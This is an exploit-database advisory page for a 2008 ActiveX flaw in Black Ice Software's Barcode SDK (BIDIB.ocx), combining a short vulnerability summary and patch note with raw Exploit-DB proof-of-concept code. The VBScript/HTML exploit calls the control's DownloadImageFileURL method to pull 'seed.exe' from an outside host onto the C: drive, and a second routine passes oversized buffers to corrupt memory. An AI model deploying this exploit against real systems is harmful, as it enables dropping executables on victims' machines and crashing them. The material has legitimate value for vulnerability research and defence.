Black Ice Software Inc Barcode SDK (BIDIB.ocx) Arbitrary File Download and Memory Corruption

vendor:

Barcode SDK

by:

shinnai

7.5

CVSS

HIGH

Arbitrary File Download and Memory Corruption

CWE

Product Name: Barcode SDK

Affected Version From: 10.9.3.0

Affected Version To: 10.9.3.0

Patch Exists: YES

Related CWE: N/A

CPE: a:black_ice_software_inc:barcode_sdk

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows XP Professional SP3, Windows 2k Professional SP3

2008

Black Ice Software Inc Barcode SDK (BIDIB.ocx) Arbitrary File Download and Memory Corruption

A vulnerability in Black Ice Software Inc Barcode SDK (BIDIB.ocx) allows an attacker to download arbitrary files and corrupt memory by using the DownloadImageFileURL method. The vulnerability is due to the lack of input validation when handling the parameters of the DownloadImageFileURL method. An attacker can exploit this vulnerability by crafting a malicious URL and passing it as a parameter to the DownloadImageFileURL method. This will allow the attacker to download arbitrary files and corrupt memory.

Mitigation:

The vendor has released a patch to address this vulnerability. Users should update to the latest version of Black Ice Software Inc Barcode SDK (BIDIB.ocx).

Source

Exploit-DB raw data:

-----------------------------------------------------------------------------
 Black Ice Software Inc Barcode SDK (BIDIB.ocx) Arbitrary File Download
 and Memory Corruption
 url: http://www.blackice.com

 File : BIDIB.ocx
 Ver. : 10.9.3.0
 CLSID: {D2797899-BE27-4CDB-892F-4FDC26EA9BA9}

 Mark.: RegKey Safe for Script: True
        RegKey Safe for Init: True
        Implements IObjectSafety: False

 Author: shinnai
 mail: shinnai[at]autistici[dot]org
 site: http://shinnai.altervista.org

 This was written for educational purpose. Use it at your own risk.
 Author will be not responsible for any damage.

 Windows XP Professional SP3 fully patched, with Internet Explorer 7
 Windows 2k Professional SP3 fully patched, with Internet Explorer 6

 In memory of rgod
-----------------------------------------------------------------------------
<object classid='clsid:D2797899-BE27-4CDB-892F-4FDC26EA9BA9' id='test'></object>

<input language=VBScript onclick=tryMe() type=button value='Click here to start the arbitrary file download test'>

<input language=VBScript onclick=MemoryCorruption() type=button value='Click here to start the memory corruption test'>

<script language='vbscript'>
 Sub tryMe
  test.DownloadImageFileURL "http://somesite.com/seed.exe", "C:\seed.exe"
 End Sub
</script>

<script language='vbscript'>
 Sub MemoryCorruption
  buff_0 = String(2068, "A")
  
  buff_1 = String(2068, "B")
  
  test.DownloadImageFileURL buff_0, buff_1
 End Sub  
</script>

# milw0rm.com [2008-06-05]